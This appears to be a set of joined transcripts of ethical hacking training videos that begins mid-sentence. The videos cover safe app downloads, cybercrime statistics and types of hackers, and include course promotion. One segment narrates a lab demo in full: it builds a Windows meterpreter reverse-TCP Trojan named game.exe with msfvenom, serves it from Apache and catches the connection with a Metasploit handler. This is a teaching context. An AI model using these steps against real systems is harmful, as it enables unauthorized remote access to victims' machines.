phone as well. So that's added headaches, and it may just not be worth it. There are so many other people who don't use these kind of techniques who can be hacked much easily than people who have an added layer of security introduced. And be very careful when you're downloading apps. Now, when we say applications on your mobile phones as well as in your computers, on your mobile phone, you still have a certain level of security where you can go to the Apple Marketplace or whatever it is called, the Google Marketplace or whatever it is called, and they do have some level of control. But when you talk about Windows operating systems and you're going on to the open internet to look for different kinds of softwares, you have no idea whether the website that you're on is trustworthy or is hosted by a hacker with a malware on that particular file that you're downloading, especially if you're downloading a pirated program. Never download a pirated program. So be very careful when you're downloading apps. When you're downloading an executable file, you can upload it to virustotal.exe, scan it to see if there are any viruses or malwares within it. The website also helps you analyze URLs to see if the URL itself may have any malicious attacks within them, embedded scripts or redirector scripts or things like that. So you can use that website to scan the apps that you're downloading and see if there is anything malicious about those apps. Moving on to cybercrime statistics. Now this is going to be interesting. Let's talk about how these things and the percentile of these things in today's world. By 2020, we would have generated 300 billion passwords. Now, the human population on this planet is 7 billion. Imagine 7 billion having 300 billion passwords. And I think half the population wouldn't have access to computers or the internet either. So imagine the number of passwords that we have. And that's what makes us use easy passwords, makes us repeat those passwords, and we use a single password for multiple accounts, right? Because there are just so many passwords that we have to remember. But that's the way it is. And if we want to keep ourselves secure, we are responsible for it. So please be very careful with those passwords. 24,000 malicious mobile apps blocked daily. In fact, the latest example that I can give you, I use an Android phone and there's an application that I've always used called Cam Scanner. And recently, just 3 days back, my mobile phone started telling me that it is a malicious app, right? I've been using it for years now, probably 3 or 4 years, maybe more. What is the software? You can click pictures of a document, it will automatically convert it, it will beautify it, if that's a word, convert it into a PDF, and I can then send it as an attachment via email. A very handy app for me, or was an handy app for me, It worked beautifully, but 3 days back, suddenly the Android operating system and my antivirus on my Android phone started reporting it as a malicious software. So I went online and I checked into it, and it seemed that over a period of time, the developers changed their vision of that software, made it spyware, and then there was a dropper involved within that application which would then download a malware from a third-party server, install it, and start spying on you and start showing you malicious advertisements, right? So this was an existing app which was trusted over a period of years, and over a period of time, slowly they modified it into a spyware. Kaspersky was an organization that detected it in the first place and then pointed it out to Google. Google took it off the Google Play Market, and now there is a variant of it available, but if you look at the reviews, all of them are 1 stars, where they have identified that this is a malware now and it spies on them and it actually compromised some people's data. So that's the latest example. In 2017 or 18, there were 700,000 apps during that year that were identified by Google as malicious apps and were deleted from Google Play. So even if they're published, there will be thousands of people who will download it till the time Google realizes that it is a malware and then deletes it. Till then, you've already been compromised, and there is no way to protect yourself now. So be very careful when you download these applications. In the healthcare sector, ransomware attacks will quadruple. Now, the healthcare sector is a very volatile sector. It contains a lot of private and sensitive information, health information about individuals that can be misused by a lot of organizations, advertisements, pharmaceutical organizations, life insurance people, and whatnot, right? So these become very lucrative targets for hackers, where if they can steal the database and sell it on the black market, they will earn a lot of money. Ransomwares would basically work the other way around. They encrypt the data at the hospital side, and then they will hold the hospital ransom to pay up. Now, you know how hospitals earn nowadays, right? So that's a lot of money that we're looking at. Cybercrime would cost up to $6 trillion in 2021. $6 trillion just for cybercrime. We're not talking about the income from the IT industry. We're talking about how much money we will lose to cybercrime because of the various attacks that would be created. 90% of hackers use encryption. Not only encryption, most of the advanced hackers will try to hide their identity by spoofing their IP addresses, MAC addresses, locations. They will use encryption and cryptography to hide their malicious softwares, to fool the antiviruses, IDSs, IPSs. And it is a very difficult task to even identify a particular malware, analyze it, and then do a root cause analysis and try to figure out who the responsible hacker was. So it's a very intensive task of doing such things, and most of the hackers would go scot-free because it is very difficult to identify them. Now, let's move on to the demo. It's a very interesting demo. We are using Metasploit, which is a penetration testing tool, and we are going to use a demo of using Metasploit. We are going to try to compromise the security of a particular system. Well, let's discuss the demo before we start executing it. So what we have done here is that we have 2 virtual machines on VMware Workstation. One is the Kali Linux machine, and the other is a Windows 7 machine. What we are going to do is we are going to use a penetration testing tool called Metasploit, which is available freely on Kali Linux, and we are going to use a particular payload generator on Metasploit called MSF Venom. And using MSF Venom, we are going to create a backdoor, executable file which will contain a Trojan or a backdoor, and we are going to try to infect that to the Windows machine and see what happens when the victim executes that particular file. Now we are going to keep it at the basic level. We're just going to create the Trojan and then we are going to execute it. In a later lecture or in a later video, we'll see how we can mask that Trojan into a legitimate looking application so that a victim can be fooled by the application that we're going to execute. So let's start with the demo. Alright, so this is the Kali Linux VM and the other machine is a Windows 7 virtual machine. So what we are going to do is, on the Kali Linux machine, we are going to just open up a command prompt, right? It's just a regular command prompt, regular commands. And what we are going to do is we are going to use the MSF Venom payload generator from Metasploit to create a game.exe file. Now the Trojan will be contained within the game.exe. So the command goes as such: MSF Venom -p for platform. We want it, or rather payload at this point in time, we want the payload to be Windows meterpreter reverse _ TCP L host, and the IP address for the local host. I'll explain the command once I've typed it. Let's just check what our IP address for this machine is. And we have 192.168.71.133. And that's what we are going to type in here. 192.168.71.133. L port 4444-F exe-a x86. And we want that output in root desktop, and we want it as game.exe. So let's go through the command. The MSF Venom is the initiator command. It invokes the payload generator in Metasploit. -p is the payload. We want Windows Meterpreter reverse TCP. So what is a reverse TCP? Here, the Meterpreter allows us for remote code execution, where we are going to create the payload. We are going to execute the payload at the victim's end, and the payload will then generate a connection back to us being the hacker's machine, and thus the local host, which is the IP address of this machine, which is the hacker's machine that we're using right now, which is 192.168.71.133. That's why we have typed in the local host. And L port is the local port on which port do we want to listen in, or we want the payload to connect to the local host. So what we are doing is the Meterpreter allows us remote code execution. We create the game.exe, we execute it at the victim's end. It is pre-coded to connect to a local host. The IP address is coded over there to a particular port, which in this case is 4444. You can put in any port number you want. Just ensure that the port is going to be free and it is not a regularly used port. Otherwise, you're going to get problems over there. So at this point in time, we're going to keep it as 4444. -F stands for function. We want an executable file. -A stands for the architecture. Here the architecture is 886, which is x86, which is 32-bit, and we are going to export it, and we are going to host it, or we are going to create the file on root desktop, and we are logged in as root, as you can see at the prompt. So when I press enter, I should see a game.exe popping up right about here on my desktop, if the command is correct, which it should be, and that's game.exe. Wait for it to be compiled properly. So there you can see platform Windows for payload, no encoder, payload size 333 bytes, and final size of executable file is 73,802 bytes. So now we have created game.exe. Now we are not going to convert this into, or we are not going to merge this into a malware and things like that. We are going to keep it simple. So to keep it simple, what I'm going to do is, as a hacker, I'm going to host this on a server, which is going to be on this same machine, right? So when we say we want to host an Apache server, the server is hosted in a directory called /var/www. So let's go there. Present working directory. We can see that we are in root cd var www, and there we are cd html, and that is where our web servers would be. So what we are going to do is we are going to create a directory mkdir shared, right, to an ls, and you can see the shared folder right here. ls-al will give you the list and the attributes, and we can see these attributes. We want to change these attributes, so we are going to use a chmod recursive command, give the permissions as 755 to the folder shared. Since we are in the same directory, we do not need to give the path for shared. Let's just verify it, and you can see the permissions being changed. And now what we are going to do is we are going to change the ownership from root to www-data for the web hosting. So ch own for change ownership, recursive www-data : www-data to shared. All right, let's check if that's been done properly. And you can see that earlier it was root, and now it is www-data, right? And so that's the directory that we have created. Let's go back. What we want to do is we want to copy game.exe into this folder. So cp root desktop game.exe var www html shared, and cd shared. Let's see, we have game.exe right there. There it is. And now what we want to do is service apache to start. So essentially what we have done is we have created a directory in the HTML folder to host this file, and we have copied it from our desktop into the shared folder. And I'm going to pause here for a minute. Alright, so we have started the service for the Apache 2 server. That means we have started the web server. We have hosted the game.exe on the web server in the shared folder. We have changed the permissions and the ownership for the shared folder. Now we are going to go on to the Windows 7 machine and we are going to open up the browser and see if the web server is now accessible. So if you remember, the IP address of that machine was 192.168.71.133 and we were in the shared folder. 192.168.71.133 shared, and if this is done properly we should see the game.exe right here, and once we click on it, it's going to ask us whether we want to save the file. 72.1 KB, we are going to save it, and I'm going to save it on I think it just saved it here. And now before we execute it, we are going to go back into Kali Linux and we are now going to start the listener. Right, so we have created the exploit, we have created the payload rather, we have hosted it onto a web server, which means that when somebody double clicks on it, the machine is going to try to create a reverse connection to our hacker's machine, but our hacker's machine needs to be configured to handle that incoming connection. So we are going to start off with MSF console. Now MSF console is the command which starts up Metasploit. Right, so we're just going to take a minute over here. You can see it's Metasploit framework console. It's going to start. It's does take a little bit of a while, and we're just going to wait it out. Let me turn this into full screen. Now you can see at the bottom left, we are on MSF on the MSF prompt. We are using Metasploit with 1699 exploits. Now this is not the completely updated version. The latest one would have around 1800 exploits, but the one that we want is exists in this version, so we are good to go. So we start off with the configuration of Metasploit to listen in onto that particular connection. So we say use exploit multi-handler. And when we say multi is basically something that affects multiple operating system, and we're going to use that exploit. And you can see it's now opening up the handler which we need to configure, and here we're going to set the payload that it is going to expect, the payload being Windows meter reverse underscore TCP. You can see that the payload has been configured. We are going to say show options, and you'll see it is going to ask us options for the payload, which means the local host, the listen address, and the listen port. Now you can see we had by default given 4444, which is the default port for this exploit within Metasploit. If you want to change, if you have changed the port when you created game.exe, you need to change the port over here as well. And the commands here that says set lhost equals 192.168.71.133. Enter, and I think I did a typo, so there's no equal to, that's it. And you can see now it shows the equal to mark, and we have now set the local host. If we want to set the L port, that's how we do it. We had 4444 and there it is. So if you have changed the port in the game.exe, ensure that you change the port here as well. Show options, and you'll see now the data is populated over here. Lhost, which is the local host, is 192.168.71.133, and L port, the local port, is 4444. We have configured this, and now what we are going to do is we're just going to type in exploit, and now you can see that it has started the reverse TCP handler on 192.168.71.133 on port 4444. So now when the victim, which is Windows 7, executes the file and we say run, at the victim's end, there's nothing that should happen. It's just resolving something, and at the other end, you can see that a meter session has been opened, and it shows us that from the victim's IP, which is 71.129 on port 49493, we are connected to our machine. So that's the connection that has happened. Press enter and you can see it exits the session. Let's just look at the IP address on Windows to confirm that was the same machine that we had, and that's 129. Right there it is. Let's open up this file again and see what happens, and you can see the second session being opened up right here to a PWD, and you can see that we were connected to that particular website. Right, so that's what this Trojans are supposed to do, give us a backdoor entry, and we then are able to connect, and we are able to copy data, and we are able to, basically we have a backdoor so we can do anything and everything that we want to do.
We humans are highly tech savvy in today's times. With the extensive use of the internet and modern technologies, there is a massive challenge in protecting all our digital data, such as net banking information, account credentials, and medical reports, to name a few. Have you heard about the deadly WannaCry ransomware attack? The attack happened in May 2017 in Asia, and then it spread across the world. Within a day, more than 230,000 computers were infected across 150 countries. The WannaCry cryptoworm encrypted the data and locked the users out of their systems. For decryption of the data, the users were asked for a ransom of $300 to $600 in Bitcoin. The users who used the unsupported version of Microsoft Windows and those who hadn't installed the security update of April 2017 were targeted in this attack. The WannaCry attack took a toll on every sector. Top-tier organizations like Hitachi, Nissan, and FedEx had to put their businesses on hold as their systems were affected too. Now, this is what you call a cyber attack. To prevent such attacks, cybersecurity is implemented. We can define cybersecurity as the practice of protecting networks, programs, computer systems, and their components from unauthorized digital attacks. These illegal attacks are often referred to as hacking. Hacking refers to exploiting weaknesses in a computer network to obtain unauthorized access to information. A hacker is a person who tries to hack into computer systems. This is a misconception that hacking is always wrong. There are hackers who work with different motives. Let's have a look at 3 different types of hackers. Black hat hackers are individuals who illegally hack into a system for monetary gain. On the contrary, we have white hat hackers who exploit the vulnerabilities in a system by hacking into it with permission in order to defend the organization. This form of hacking is absolutely legal and ethical. Hence, they are also often referred to as ethical hackers. In addition to these hackers, we also have the gray hat hackers. As the name suggests, the color gray is a blend of both white and black. These hackers discover vulnerabilities in a system and report it to the system's owner, which is a good act. But they do this without seeking the owner's approval. Sometimes gray hat hackers also ask for money in return for the spotted vulnerabilities. Now that you have seen the different types of hackers, let's understand more about the hacking that is legal and valid, ethical hacking, through an interesting story. Dan runs a trading company. He does online training with the money his customers invest. Everything was going well, and Dan's business was booming, until a hacker decided to hack the company's servers. The hacker stole the credentials of various trading accounts. He asked for a lump sum ransom in exchange for the stolen credentials. Dan took the hacker's words lightly and didn't pay the hacker. As a result, the hacker withdrew money from various customers' accounts, and Dan was liable to pay back the customers. Dan lost a lot of money, and also the trust of his customers. After this incident, Dan gave a lot of thought as to what could have gone wrong with the security infrastructure in his company. He wished there was someone from his company who could have run a test attack to see how vulnerable his systems were before the hacker penetrated into the network. This was when he realized he needed an employee who thinks like a hacker and identifies the vulnerabilities in his network before an outsider does. To do this job, he hired an ethical hacker, John. John was a skilled professional who worked precisely like a hacker. In no time, he spotted several vulnerabilities in Dan's organization and closed all the loopholes. Hiring an ethical hacker helped Dan protect his customers from further attacks in the future. This, in turn, increased the company's productivity and guarded the company's reputation. So, now you know hacking is not always bad. John, in this scenario, exposed the vulnerabilities in the existing network, and such hacking is known as ethical hacking. Ethical hacking is distributed into 6 different phases. Let us look at these phases step by step with respect to how John, our ethical hacker, will act. Before launching an attack, the first step John takes is to gather all the necessary information about the organization's system that he intends to attack. This step is called reconnaissance. He uses tools like Nmap and hping for this purpose. John then tries to spot the vulnerabilities, if any, in the target system using tools like Nmap and Nexpose. This is the scanning phase. Now that he has located the vulnerabilities, he then tries to exploit them. This step is known as gaining access. After John makes his way through the organization's networks, he tries to maintain his access for future attacks by installing backdoors in the target system. The Metasploit tool helps him with this. This phase is called maintaining access. John is a brilliant hacker. Hence, he tries his best not to leave any evidence of his attack. This is the fifth phase, clearing tracks. We now have the last phase, that is reporting. In this phase, John documents a summary of his entire attack, the vulnerabilities he spotted, the tools he used, and the success rate of the attack. Looking into the report, Dan is now able to take a call and see how to protect his organization from any external cyber attacks. Don't you all think John is an asset to any organization? If you want to become an ethical hacker like John, then there are a few skills that you need to acquire. First and foremost, you need to have a good knowledge of operating environments such as Windows, Linux, Unix, and Macintosh. You must have reasonably good knowledge of programming languages such as HTML, PHP, Python, SQL, and JavaScript. Networking is the base of ethical hacking, hence, you should be good at it. Ethical hackers should be well aware of security laws so that they don't misuse their skills. Finally, you must have a global certification on ethical hacking to successfully bag a position of an ethical hacker like John. Few examples of ethical hacking certification are Certified Ethical Hacker Certification, CEH, CompTIA Pentest Plus, and Licensed Penetration Tester Certification, to name a few. Simplilearn provides a Cybersecurity Expert Master's program that will equip you with all the skills required by a cybersecurity expert. You could have a look at it by clicking the link in the description. The endless growth of technologies in this area is directly proportional to the number of cybercrimes. Cybercrimes are estimated to cost $6 trillion in 2021. Hence, to tackle these cybercrimes, organizations are continuously on the lookout for cybersecurity professionals. The average annual salary of a certified ethical hacker is $91,000 in the US and approximately rupees 7 lakhs in India. So, what are you waiting for? Get certified and become an ethical hacker like John and put an end to the cyber attacks in the world.
When we hear the term hacker, we may picture a dangerous cyber criminal. However, not all hackers are inherently bad. They are powerful individuals who use their technical skills to break into computer networks and bypass security measures. Hacking is not always bad, and it is to be noted that the world of computers is actually safer to an extent because of a particular type of hacker. A hacker is deemed to be good or bad depending on their motive and whether or not they are breaking the law. Hackers are basically categorized by the type of metaphorical hat they don: white hat, grey hat, and black hat. Hackers can either be a black hat or a white hat or a grey hat. Hackers can be good or bad depending on which color hat they decide to wear, and by this we mean their hacking motives, and obviously not in the sense of creating a fashion statement here. Let's have a look at our story. Our story here revolves around Dan, who is the owner of a company that provides a platform for video conferencing. His platform enables online communication for video meetings, audio meetings, and webinars. Just like other video conferencing platforms, his platform too has built-in features like chat, recording, screen sharing, and so on. Everything went well and his business increased tremendously with the onset of the COVID-19 pandemic. COVID-19 accelerated the rise of the worldwide digital economy, and it made people rapidly adopt video conferencing tools and apps. In a contactless world, starting from employee interactions to family get-togethers to virtual workout classes, everything happened virtually. Dan's video conferencing platform enabled long-distance communication and enhanced collaboration. So now you might be wondering what could have gone wrong. Well, there are many risks involved when it comes to the safety of these online platforms. Online meeting rooms are susceptible to a number of digital threats. Dan received complaints from his customers that his platform wasn't secure and safe anymore. Little did Dan know that the popularity of his video conferencing platform made hackers eager to disrupt the virtual meetings and hijack the conferences. His platform witnessed complaints like the addition of an unknown participant in every meeting room, someone covering up information that is being presented, and also unknown screen recording of a meeting, to name a few. These intruders were sneaky hackers who tried to gain access to sensitive information and who tried to disrupt meetings. And how did these hackers manage to do all this? Well, this was done by exploiting weaknesses in Dan's computer network in order to obtain unauthorized access to crucial data and sensitive information. This is known as hacking, and the individuals who carry this out are known as hackers. In this form of hacking that Dan witnessed, hackers exploited Dan's company's security posture by identifying weaknesses in it in order to intrude into the meetings and gain access to business data or personal data. And this form of hacking is definitely bad and unethical. The hackers who carried this against Dan's company are known as black hat hackers. These hackers are cyber criminals who carry out cyber attacks with a negative intention. These attacks can be in the form of Trojan virus, malware attacks, phishing attacks, DDoS attacks, man-in-the-middle attacks, SQL injection attacks, and so on. So who exactly is a black hat hacker? Like in the case of Dan's organization's Cyberattack, black hat hackers are highly skilled cyber criminals who break into computer systems and networks with malicious intent. They illegally hack into a system, and this is obviously without the system owner's approval. Such hackers do not abide by the laws, they violate laws and disrupt networks. The motive behind these attacks vary from monetary gains to personal profit. Usually they are for monetary gains. Black hat hackers may violate the confidentiality, integrity, or availability of a company's systems and data. They may also use malware to destroy files or steal passwords, credit card numbers, and other confidential information. Black hat hackers are also sometimes called crackers. So this is who a black hat hacker is. Moving back to Dan's story, black hat hackers disrupted his business and he lost his customers as nobody wished to communicate on an unsecure platform. It is but true, right? Would you be okay to use a platform that is unsafe? None of us want to have unknown people in our meetings, right? This is how Dan's customers felt too, and this news spread and his company's reputation took a bad hit. That is when Ted approached Dan. So who is Ted? Let's have a look at that now. Ted, who was unknown to Dan, explained to him that he found Dan's network to be weak. Ted told Dan that he has identified vulnerabilities in Dan's systems and networks and he will fix them provided Dan pays him well. Dan had nothing to lose, and without any further delay, he paid Ted a good amount of money to fix the vulnerabilities in Dan's networks. On receiving the money, Ted began his work and he fixed all the issues and vulnerabilities in Dan's network. He made sure that nobody can exploit Dan's network vulnerabilities again, and this way he safeguarded Dan's network for the time being. So who is Ted? Well, he's called a grey hat hacker. As they say, not all things are black and white, so is the concept of grey hat hackers. As fascinating as the name sounds, let us dive deep into understanding the role of a grey hat hacker. A grey hat is a security expert who may at times violate the laws or the ethical standards. However, they do not carry a malicious intent unlike a black hat hacker. Hence, they are known to work both defensively and offensively. They land between the good and the bad. Grey hat hackers look for vulnerabilities in a system without permission, but with good intentions. Just like how Ted informed Dan about how he could exploit Dan's system vulnerabilities, grey hat hackers inform an organization the same and in return ask for a fee to fix it. In some cases, when the organization doesn't comply, grey hat hackers may become black hat hackers. Although a grey hat hacker's intention might not be bad, what they do is still illegal since they do not have permission to break into another system. Back to our story. Although Dan's issue was sorted by Ted for the time being, he had a few concerns. His first concern was history repeating itself. Yes, he was worried about what if black hat hackers hack into his systems again. Although his system vulnerabilities are fixed at the moment, it was a matter of time before they could be exploited again with new hacking techniques. His next thought was to have a professional who could constantly keep a tab on his networks and protect it from hackers. Don't you think his concerns were justified? Yes, it was, as this was the only way he could provide a safe and secure video conferencing platform in the long run. That is when Dan's friend came to his rescue and introduced Anne, the ethical hacker, to him. And being an ethical hacker assured Dan that she would scan and identify his network for system vulnerabilities before an outsider exploits it, and she would fix those vulnerabilities on a regular basis. Such ethical hackers like Anne are called white hat hackers. Now that we saw who black hat hackers and grey hat hackers were, it is time we learn about our third type of hacker, who is a white hat hacker. A white hat hacker gains access to networks with an intention to fix the identified weaknesses. They also perform penetration testing and vulnerability assessments and break into systems with permission. They search for loopholes or vulnerabilities in any given piece of technology, just like how a black hat hacker would do. However, white hat hackers harden their organization system before the bad guy can get in. Their goal is to spot system and network vulnerabilities in order to improve system security. White hat hackers are also known as ethical hackers since they obey the law of the land and follow a code of ethics. Many companies and government organizations employ white hat hackers to help them secure their systems. These hackers are typically hired by organizations to look for vulnerabilities in a system like other hackers. The only difference being they are given permission to break in. Once Dan spots the vulnerabilities, she documents her findings and gives Dan advice on how to fix them, or she'll even take it up to fix them so that an outsider cannot spot it in the future. Anne does this on a regular basis as system updates happen regularly, and it is imperative to be on track with it and fix new vulnerabilities. This made sure Dan's network is now safe and secure. Gradually, he regained his customers' trust and his platform got back to being one of the best and safest platforms for video conferencing. This resulted in a huge business growth and Dan was very happy. Just like how Anne put an end to Dan's business problems, there are many white hat hackers out there who are in great demand by organizations to safeguard their networks from cyber attacks. And if you are interested in a career in ethical hacking, then Simplilearn can help you fulfill your dreams. Simplilearn CEH version 11 certification provides you the hands-on training required to master the techniques hackers use to penetrate network systems and fortify your system against it. This ethical hacking course is aligned with the latest CEH version 11 by EC Council and will adequately prepare you to increase your blue team skills. So what are you waiting for? Get certified with Simplilearn and become a certified ethical hacker and put an end to the cybercrimes in the world. Remember, the more active white hat hackers are, the fewer opportunities black hat hackers have for system exploitation.
So let's talk about hacking and what exactly hacking is. Hacking refers to exploiting weaknesses in a computer network to obtain unauthorized access to information. A hacker is a person who tries to hack into computer systems. Now here there are some keywords that we need to understand. First and foremost, exploit. When you are exploiting weaknesses are technically called vulnerabilities, which are basically design flaws, misconfiguration errors, usage of default usernames and passwords which have not been modified. So any misconfiguration or anything that has been left behind by a security administrator that can be misused, which means exploited by a hacker to gain unauthorized access. So the next term is unauthorized access, something that you're not allowed to do. And when you say a hacker is a person who tries to hack, it's basically a person with malicious intent trying to gain access to a system or a resource that they are not authorized to access in the first place. How do they do it? They find a vulnerability that is a weakness or a flaw, and then they misuse it to gain access to that particular network. So here in the diagram, you can see that a sender on the left hand side is trying to send some data to the receiver on the right hand side. The hacker would try to gain unauthorized access to the transmission that is being sent and would try to capture the data packets and read the secrets within. Let's look at a business case scenario into hacking. Now there is an organization, everybody is going around their own business when they realize that their systems may have been compromised. Now they're trying to look at the customer data to ensure that that has not been compromised and trying to assure the customers. However, they do realize that some customer data has been lost and even the company reports have been modified as well. Now this is the scenario where there have been some security controls in place and those controls have been identified. They realized that there is an attack that has happened, and based on that attack they have realized that the data has now been compromised and the records have been modified by the hacker. which means that the data is no longer trustworthy and thus cannot be used by the business for any legal transactions. So then the hacker gives a call to the organization or gets connected to the organization demanding a ransom for the data to be replaced, to be taken back into the original state where it was trusted, and thus the organization can utilize it for business transactions. The organization has probably no backup, so they decide that they want to pay the lump sum to the hacker to restore that data so that they can continue on with the business. Thus money exchanges and the hacker is able to restore that data and the business continues as usual. However, the activity here of a hacker trying to leverage the misconfiguration of the weaknesses in the organization's security, thus being able to hack them and make these ransomware demands. So the company then wants to figure out, even if having a security system in place, how was the hacker able to hack their systems? Thus, one of the employees comes up with a brilliant idea of identifying vulnerabilities in the network to proactively search for any flaws that have been left behind, so that they can plug those flaws and nobody can misuse them. Thus, they figure out that they want to hire an ethical hacker who would help them identify the security posture of the organization, identify the weaknesses, vulnerabilities and flaws, and help them remedy those flaws so that in future scenarios, these scenarios will not happen. So before we go into an ethical hacker, let's understand what are the types of hackers. So what are the types of hackers? Hacker is a technically skilled person who is very adept with computers. They have good programming skills, they understand how operating system works, they understand how networks work, they understand how to identify flaws and vulnerabilities within all of these aspects, and then they understand and know how to misuse these flaws to get a outcome which would be detrimental to the health of the organization. So there are 6 types of hackers that have been identified: black hat hackers, white hat hackers, grey hat, script kiddies, nation sponsored hackers, and hacktivists. So black hat hackers are basically the malicious hackers who have malicious intent and have criminalistic tendencies. They want to harm the organization by hacking into their infrastructure, by destroying their infrastructure, by destroying their data, so that they can gain from it from a monetary perspective. These guys are also known as crackers. The main aspect of these people are that they have malicious intent, they try to do unauthorized activities, and they try it for personal gain. Another important aspect to remember is that a black hat hacker will always try to hide their identity. They will spoof their online digital identity by masking it, by spoofing their IP addresses, MAC addresses, and try to remain anonymous on the network. A white hat hacker, on the other hand, is also an ethical hacker or a security analyst who's an individual who will do exactly the same thing that a black hat hacker would do, minus the malicious intent, plus the intent of helping the organization identifying the flaws and remedying them so that nobody else can misuse those vulnerabilities. So they are authorized to act on the company's behalf. They are authorized to do that activity which would help the company identify those flaws and thus help the company mitigate those flaws, improving on their security posture. So these kind of security experts or ethical hackers would help organizations defend themselves against unauthorized attacks. Grey hat hackers is a blend of both white hat and black hat hackers. So here they can work defensively and offensively both. They can accept contracts from organizations to increase their security posture. At the same time, they can also get themselves involved in malicious activities towards other organizations to personally gain or benefit from them by doing unauthorized activity. Script kiddies are people who are technically not much aware about what hacking is. They rely on existing tools that have been created by other hackers. They have no technical knowledge of what they're doing. It's just a hit or miss for them. So they just get their hands on a tool. They try to execute those tools. If the hack works, it works. Otherwise, it doesn't. So these people are basically who are noobs or newbies who are trying to learn hacking, or just people who with malicious intent who just want to have some fun or trying to impress people around. Then we have the nation or the state-sponsored hackers. As the name suggests, these hackers are sponsored by their government. Now, this may not be a legitimate job, but most of the governments do have hackers enrolled in their pay on their organizations to spy on their enemies, to spy on various countries and try to figure out the aspirations of those countries. So this is basically a spying activity where you're technically trying to get access to other countries' resources and then try to spy on them to figure out what their activities have been or what their future plans have been. And then we have the hacktivists, who's an individual who has a political agenda to promote, and they promote it by doing hacking. So these guys, what is the difference between a black hat hacker and a hacktivist? The black hat hacker may try to hide their identity. A hacktivist will claim responsibility of what they have done. So for them, it's a political agenda, a political cause, and they will try to hack various organizations to promote their cause. They would probably do this by defacing the website and posting the messages that they want to promote on these websites. So what exactly is ethical hacking then? We have discussed the types of hackers. We have identified a malicious hacker as a black hat hacker with the intent of doing harm to an organization's network for personal gain. We have discussed what the ethical hacker is. So an ethical hacker would be doing the same activity but in an authorized manner. So they would have legal contracts that they would be signing with the organization, which would give them a definite scope of what they are allowed to do and what they are not allowed to do. And the ethical hackers would function within those scopes, would try to execute those test scenarios where they would be able to identify those flaws or those system vulnerabilities, and then they would be submitting a report to the management of what they have found. They would also help the management to mitigate or to resolve those weaknesses so that nobody else can misuse them later on. They might use the same techniques and the same tools that black hat hackers do. However, the main difference here is that these guys are authorized to do that particular activity. They're doing it in a controlled manner with the intent of helping the organization and not with the intent of personal gains. So who's an ethical hacker? Again, an ethical hacker is a highly intelligent, highly educated person who knows how computers function, how programming languages work, how operating systems work. They can troubleshoot. They're technically very adept at computing. They understand the architecture. They understand how various components in a computer work. They can troubleshoot those components, and they can basically be very good with programming as well. Now, when I say programming, we don't want an ethical hacker to be a good developer of applications. We want them to understand programming in such a way that they can create scripts, they can write their own short programs like viruses, worms, trojans, or exploits which would help them achieve the objective that they have set out for. So here you can see the ethical hacker. They are individuals who perform a security assessment of their companies with the permission of concerned authorities. So what is a security assessment? A security assessment is finding out the exact security posture of the organization by identifying what security controls are in place, how they've been configured, and if there are any gaps in the configurations themselves. So an organization will hire an ethical hacker. They would give the ethical hacker the information about what information is, or what security controls, what firewalls, what IDSS, IPSS, intrusion detection or intrusion prevention systems, antiviruses are already in place, and then they will ask the ethical hacker to figure out a way to bypass these mechanisms and see if they can still hack the organization. What is the need of an ethical hacker? The need of an ethical hacker is proactive security. The ethical hacker would identify all the existing flaws in an organization and try to resolve those flaws to help secure the organization from black hat hackers. So ethical hackers would prevent hackers from cracking into an organization's network by securing the organization, by improving on their security on a periodic basis. And they would also try to identify system vulnerabilities, network vulnerabilities, or application level vulnerabilities that would have been missed or have already been missed, and then try to figure out a way of plugging them or resolving them so that they cannot be misused by other hackers. They would also analyze and enhance an organization's security policies. Now, what are policies? Policies are basically documents that have been created by an organization of rules that all the employees need to follow to ensure that the security of an organization is maintained. For example, a password policy. A password policy would help users in an organization to adhere to the standards the organization has identified for a password complexity. For example, a password, when a user is creating them, should adhere to standards where they are using random words. They contain the alphabet A through Z, uppercase and lowercase, 0 through 9 as numerics, and special characters, and they are randomized so that the password becomes more stronger to prevent from brute force attacks. So what would an ethical hacker do at this point in time? They would try to test the strength of the passwords to see if brute force attacks or dictionary attacks are possible, and if any of these passwords can be cracked. They would ensure that all the employees are following the policies and all the passwords are as secured as the policies want them to be. If there are any gaps in the policies or the implementation of the policy, it is the ethical hacker's responsibility to identify those gaps and warn the organization about it. Similarly, they would also try to protect any personal information, any data that is owned by the organization that is critical for the functioning of the organization, and they'll try to protect it by from falling into the hacker's hands. Now, what are the skills that are required of an ethical hacker? These are the following skills. So first and foremost, they should have good knowledge with operating systems such as Windows, Linux, Unix, and Mac. Now, when we say knowledge about operating systems, it's not only about how to use those operating systems, but how to troubleshoot those operating systems, how these operating systems work, how these operating systems need to be configured, how can they be secured. For example, securing an operating system is not only installing a firewall and an antivirus, but you need to configure permissions on an operating system of what users are allowed to do and what users are not allowed to do. For example, limiting the installation of applications. How are we going to do that? We need to go into the system center, the security center of Windows, and we need to configure security parameters over there of what are acceptable softwares and what are not. Same with Linux and Mac softwares, operating systems. So we need to know how we can secure these operating systems. Similarly, all of these would have desktop versions and server versions of operating systems. As an ethical hacker, we need to know the desktop and server versions both, how to configure them and how to provide services within the organization on these servers so that they can be consumed in a secure manner by all the employees. At the same time, they should also be knowledgeable of programming languages or scripting languages such as PHP, Python, Ruby, HTML for programming, if you will, because web servers come into the picture. So again, they should not be great developers where they can create huge applications, but they should be able to develop scripts, understand those scripts, analyze those scripts, and figure out what the output should be of those scripts to achieve the hacking goals that they have set out for. An ethical hacker should have a very good understanding about networking. No matter whether you're in application security, you're in network security, or you're in host-based security, since a computer will always be connected to a network, either a local area network like a LAN or the internet, we should know how networking works. We should know the 7 layers of the OSI model. We should know which protocols work on those 7 layers. We should identify the TCP/IP model and how a OSI model can be mapped to the TCP/IP model. We should understand how TCP and UDP work, how each and every protocol is crafted, how they are supposed to behave for us to analyze and understand any network-based attacks. We should be very good in security measures, so we should know where those vulnerabilities would lie, what are the latest exploits available in the market, and we should be able to identify them. We should be able to know the techniques and the tools of how to deal with security, how to analyze security, and then how to implement security to enhance it as well. Along with that, it is important that a security analyst or an ethical hacker is aware of the local security laws and standards. Why is that? Because an organization cannot do any illegal activity. Whatever responses that they have, whatever security mechanisms, whatever security controls they will implement, they need to be adhering to the local law of the land. They should be legal in nature and should not cause undue harm to any of the employees or any of the third-party clients that they are dealing with. So the ethical hackers should be aware of what security laws are before they implement security controls, or even before they start testing for security controls. And all of these should be backed up by having a global certification or a globally valid certification related to networking, related to security, ethical hacking, the law of the land, anything and everything. Maybe even programming. It's good to have a certification in PHP, Perl, Python, Ruby, and so on and so forth. Why? Because most of the organizations, when they hire ethical hackers, look out for these certifications, especially globally valid certifications, so that they can be sure, or they can be assured that the person that they are hiring has the required skill set. So let's talk about a few of the tools 